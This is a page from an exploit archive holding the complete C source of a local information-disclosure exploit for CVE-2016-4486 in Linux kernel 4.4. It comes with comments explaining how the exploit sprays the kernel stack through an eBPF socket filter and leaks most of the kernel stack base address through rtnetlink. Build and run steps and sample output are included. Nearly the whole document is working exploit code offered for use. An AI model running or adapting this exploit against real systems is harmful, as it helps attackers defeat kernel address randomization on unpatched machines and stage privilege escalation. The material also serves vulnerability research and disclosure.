what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux Kernel 4.4 rtnetlink Stack Memory Disclosure

Linux Kernel 4.4 rtnetlink Stack Memory Disclosure
Posted Dec 19, 2018
Authored by Jinbum Park, Kangjie Lu

Linux kernel version 4.4 rtnetlink stack memory disclosure exploit.

tags | exploit, kernel, info disclosure
systems | linux
advisories | CVE-2016-4486
SHA-256 | 40764dc8fda6722111b000f9b935f1aa492b399d8ebb435a9ac60ad02ac3fbbc

Linux Kernel 4.4 rtnetlink Stack Memory Disclosure

Change Mirror Download
/*
* [ Briefs ]
* - CVE-2016-4486 has discovered and reported by Kangjie Lu.
* - This is local exploit against the CVE-2016-4486.
*
* [ Tested version ]
* - Distro : Ubuntu 16.04
* - Kernel version : 4.4.0-21-generic
* - Arch : x86_64
*
* [ Prerequisites ]
* - None
*
* [ Goal ]
* - Leak kernel stack base address of current process by exploiting CVE-2016-4486.
*
* [ Exploitation ]
* - CVE-2016-4486 leaks 32-bits arbitrary kernel memory from uninitialized stack.
* - This exploit gets 61-bits stack base address among the 64-bits full address.
* remaining 3-bits is not leaked because of limitation of ebpf.
* - Full exploitation are performed as follows.
*
* 1. Spraying kernel stack as kernel stack address via running ebpf program.
* - We can spray stack up to 512-bytes by running ebpf program.
* - After this step, memory to be leaked will be filled with kernel stack address.
* 2. Trigger CVE-2016-4486 to leak 4-bytes which is low part of stack address.
* - After this step, stack address : 0xffff8800????????; (? is unknown address yet.)
* 3. Leak high 4-bytes of stack address. The leaking is done as one-by-one bit. why one-by-one?
* - CVE-2016-4486 allows to leak 4-bytes only, so that we always get low 4-bytes of stack address.
* - Then, How to overcome this challenge?? The one of possible answer is that
* do operation on high-4bytes with carefully selected value which changes low-4bytes.
* For example, Assume that real stack address is 0xffff880412340000;
* and, do sub operation. ==> 0xffff880412340000 - 0x0000000012360000 (selected value);
* The result will be "0xffff8803....." ==> Yap! low 4-bytes are changed!! and We can see this!
* The result makes us to know that high 4-bytes are smaller than 0x12360000;
* Then, We can keep going with smaller value.
* - The algorithm is quite similar to quick-search.
* 4. Unfortunately, ebpf program limitation stops us to leak full 64-bits.
* - 3-bits (bit[16], bit[15], bit[14]) are not leaked.
* - But, Since 3-bit is not sufficient randomness, It's very valuable for attacker.
* Bonus) Why do I use compat_sendmsg() instead of normal sendmsg()?
* - When I did spraying stack with normal sendmsg(), I couldn't spray up to memory to be leaked.
* - If I use compat-sendmsg(), The execution path will be different from normal sendmsg().
* This makes me to spray it more far.
*
* [ Run exploit ]
* - $ gcc poc.c -o poc
* - $ ./poc
* ....
* ....
* leak stack address range :
* -----from : ffff88007f7e0000
* --------to : ffff88007f7fc000
* (Since we can get 61-bit address, Print the possible address range out.)
*
* [ Contact ]
* - jinb.park7@gmail.com
* - github.com/jinb-park
*/

#include <asm/types.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <linux/bpf.h>
#include <linux/filter.h>

#define GPLv2 "GPL v2"
#define ARRSIZE(x) (sizeof(x) / sizeof((x)[0]))

#define INTERFACE_INDEX (0)
#define LEAK_OFFSET (28)

/*
* BPF-based stack sprayer
*/
/* registers */
/* caller-saved: r0..r5 */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5
#define BPF_REG_CTX BPF_REG_6
#define BPF_REG_FP BPF_REG_10

#define BPF_MOV32_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_ST_MEM(SIZE, DST, OFF, IMM) \
((struct bpf_insn) { \
.code = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM, \
.dst_reg = DST, \
.src_reg = 0, \
.off = OFF, \
.imm = IMM })
#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_STX_ADD_MEM(SIZE, DST, SRC, OFF) \
((struct bpf_insn) { \
.code = BPF_STX | BPF_XADD | BPF_SIZE(SIZE),\
.dst_reg = DST, \
.src_reg = SRC, \
.off = OFF, \
.imm = 0 })
#define BPF_MOV64_IMM(DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_EXIT_INSN() \
((struct bpf_insn) { \
.code = BPF_JMP | BPF_EXIT, \
.dst_reg = 0, \
.src_reg = 0, \
.off = 0, \
.imm = 0 })
#define BPF_MOV64_REG(DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_MOV | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })
#define BPF_ALU64_IMM(OP, DST, IMM) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_K, \
.dst_reg = DST, \
.src_reg = 0, \
.off = 0, \
.imm = IMM })
#define BPF_ALU64_REG(OP, DST, SRC) \
((struct bpf_insn) { \
.code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \
.dst_reg = DST, \
.src_reg = SRC, \
.off = 0, \
.imm = 0 })

int bpf_(int cmd, union bpf_attr *attrs)
{
return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int prog_load(struct bpf_insn *insns, size_t insns_count)
{
char verifier_log[100000];
union bpf_attr create_prog_attrs = {
.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
.insn_cnt = insns_count,
.insns = (uint64_t)insns,
.license = (uint64_t)GPLv2,
.log_level = 1,
.log_size = sizeof(verifier_log),
.log_buf = (uint64_t)verifier_log
};
int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
int errno_ = errno;
errno = errno_;
if (progfd == -1) {
printf("bpf prog load error\n");
exit(-1);
}
return progfd;
}

int create_socket_by_socketpair(int *progfd)
{
int socks[2];
if (socketpair(AF_UNIX, SOCK_SEQPACKET, 0, socks)) {
printf("socketpair error\n");
exit(-1);
}
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, progfd, sizeof(int))) {
printf("setsockopt error\n");
exit(-1);
}
return socks[1];
}

int create_filtered_socket_fd(struct bpf_insn *insns, size_t insns_count)
{
int progfd = prog_load(insns, insns_count);
return create_socket_by_socketpair(&progfd);
}

#define NR_sendmsg_32 370 // for 32-bit

typedef unsigned int compat_uptr_t;
typedef int compat_int_t;
typedef unsigned int compat_size_t;
typedef unsigned int compat_uint_t;

struct compat_msghdr {
compat_uptr_t msg_name; /* void * */
compat_int_t msg_namelen;
compat_uptr_t msg_iov; /* struct compat_iovec * */
compat_size_t msg_iovlen;
compat_uptr_t msg_control; /* void * */
compat_size_t msg_controllen;
compat_uint_t msg_flags;
};
struct compat_iovec {
compat_uptr_t iov_base;
compat_size_t iov_len;
};

int sendmsg_by_legacy_call(int fd, unsigned int msg, int flags)
{
int r = -1;

asm volatile (
"push %%rax\n"
"push %%rbx\n"
"push %%rcx\n"
"push %%rdx\n"
"push %%rsi\n"
"push %%rdi\n"
"mov %1, %%eax\n"
"mov %2, %%ebx\n"
"mov %3, %%ecx\n"
"mov %4, %%edx\n"
"int $0x80\n"
"mov %%eax, %0\n"
"pop %%rdi\n"
"pop %%rsi\n"
"pop %%rdx\n"
"pop %%rcx\n"
"pop %%rbx\n"
"pop %%rax\n"
: "=r" (r)
: "r"(NR_sendmsg_32), "r"(fd), "r"(msg), "r"(flags)
: "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi"
);

return r;
}

#define COMPAT_SENDMSG
void trigger_proc(int sockfd)
{
#ifdef COMPAT_SENDMSG
struct compat_msghdr *msg = NULL;
struct compat_iovec *iov = NULL;
#else
struct msghdr *msg = NULL;
struct iovec *iov = NULL;
#endif
char *buf = NULL;
int r;

// allocate under-32-bit address for compat syscall
msg = mmap(0x70000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (msg == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
buf = mmap(0x90000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (buf == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}
iov = mmap(0xb0000, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
if (buf == MAP_FAILED) {
printf("mmap error : %d, %s\n", errno, strerror(errno));
exit(0);
}

#ifdef COMPAT_SENDMSG
iov->iov_base = (compat_uptr_t)buf;
#else
iov->iov_base = buf;
#endif
iov->iov_len = 128;
msg->msg_name = NULL;
msg->msg_namelen = 0;
#ifdef COMPAT_SENDMSG
msg->msg_iov = (compat_uptr_t)iov;
#else
msg->msg_iov = iov;
#endif
msg->msg_iovlen = 1;
msg->msg_control = NULL;
msg->msg_controllen = 0;
msg->msg_flags = 0;

#ifdef COMPAT_SENDMSG
r = sendmsg_by_legacy_call(sockfd, (unsigned int)msg, 0);
#else
r = sendmsg(sockfd, msg, 0);
#endif
if (r < 0) {
printf("sendmsg error, %d, %s\n", errno, strerror(errno));
exit(-1);
}
}

int sockfds = -1;

void stack_spraying_by_bpf(unsigned long val)
{
int r;

struct bpf_insn stack_spraying_insns[] = {
BPF_MOV64_REG(BPF_REG_3, BPF_REG_FP),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -val),

BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -368),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -376),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -384),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -392),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -400),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -408),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -416),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -424),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -432),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -440),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -448),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -456),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -464),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -472),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -480),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -488),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -496),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -504),
BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_3, -512),

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN()
};

sockfds = create_filtered_socket_fd(stack_spraying_insns, ARRSIZE(stack_spraying_insns));
if (sockfds < 0)
return;

trigger_proc(sockfds);
close(sockfds);
//sleep(1);
}

/*
28byte, 32byte including padding
struct rtnl_link_ifmap {
__u64 mem_start;
__u64 mem_end;
__u64 base_addr;
__u16 irq;
__u8 dma;
__u8 port;
};*/

// rtnl_fill_link_ifmap <-- rtnl_fill_ifinfo (symbol)

struct {
struct nlmsghdr nh;
struct ifinfomsg ifm;
char attrbuf[512];
} req;

// Ubuntu 4.4.0-21-generic
#define RANGE_MIN_MASK ~((1<<16) | (1<<15) | (1<<14)) // and
#define RANGE_MAX_MASK ((1<<16) | (1<<15) | (1<<14)) // or

int main(int argc, char **argv)
{
unsigned char buf[65535];
unsigned char map_buf[36] = {0,};
struct nlmsghdr *nl_msg_ptr;
struct ifinfomsg *inf_msg_ptr;
struct rtnl_link_ifmap *map_ptr;
struct rtattr *rta_ptr;
int size, len, attr_len, offset;
int progfd;
unsigned int sub_val = 0;
unsigned int leak_value;
unsigned long leak_full_stack = 0;
unsigned int low_stack = 0;
int i;

for (i=0; i<16; i++) {
int rtnetlink_sk = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE);

memset(&req, 0, sizeof(req));

req.nh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg));
req.nh.nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST;
req.nh.nlmsg_type = RTM_GETLINK;
req.nh.nlmsg_seq = 1;

req.ifm.ifi_family = AF_UNSPEC;
req.ifm.ifi_index = INTERFACE_INDEX;
req.ifm.ifi_change = 0xffffffff;

if (i == 0)
sub_val = 0;
else
sub_val += (1 << (32 - i));

stack_spraying_by_bpf((unsigned long)sub_val);
if (send(rtnetlink_sk, &req, req.nh.nlmsg_len, 0) < 0) {
printf("send error\n");
goto out;
}

while (1) {
if ((size = recv(rtnetlink_sk, buf, sizeof(buf), 0)) < 0) {
fprintf(stderr, "ERROR recv(): %s\n", strerror(errno));
goto out;
}

for (nl_msg_ptr = (struct nlmsghdr *)buf; size > (int)sizeof(*nl_msg_ptr);) {
len = nl_msg_ptr->nlmsg_len;

if (nl_msg_ptr->nlmsg_type == NLMSG_ERROR) {
printf("NLMSG_ERROR\n");
goto out;
}
else if (nl_msg_ptr->nlmsg_type == NLMSG_DONE)
break;

if (!NLMSG_OK(nl_msg_ptr, (unsigned int)size)) {
printf("Not OK\n");
goto out;
}

attr_len = IFLA_PAYLOAD(nl_msg_ptr);
inf_msg_ptr = (struct ifinfomsg *)NLMSG_DATA(nl_msg_ptr);
rta_ptr = (struct rtattr *)IFLA_RTA(inf_msg_ptr);

for (; RTA_OK(rta_ptr, attr_len); rta_ptr = RTA_NEXT(rta_ptr, attr_len)) {
if (rta_ptr->rta_type == IFLA_MAP) {
if (rta_ptr->rta_len != sizeof(map_buf)) {
printf("wrong size\n");
goto out;
}

memcpy(map_buf, RTA_DATA(rta_ptr), sizeof(map_buf));
map_ptr = &map_buf;
leak_value = *(unsigned int *)(map_buf + LEAK_OFFSET);
printf("leak_value : %08x\n", leak_value);
break;
}
}

size -= NLMSG_ALIGN(len);
nl_msg_ptr = (struct nlmsghdr *)((char *)nl_msg_ptr + NLMSG_ALIGN(len));
}

break;
}

if (low_stack == 0)
low_stack = leak_value;
else
if (leak_value != low_stack)
sub_val &= (~(1 << (32 - i))); // clear bit

memcpy((unsigned char *)&leak_full_stack + 4, &low_stack, 4);
memcpy((unsigned char *)&leak_full_stack, &sub_val, 4);
printf("[try-%d] stack address : %lx\n", i, leak_full_stack);
out:
close(rtnetlink_sk);
}

printf("=======================================================================\n");
printf("leak stack address range : \n");
printf("-----from : %lx\n", leak_full_stack & RANGE_MIN_MASK);
printf("--------to : %lx\n", leak_full_stack | RANGE_MAX_MASK);
printf("======================================================================\n");

return 0;
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close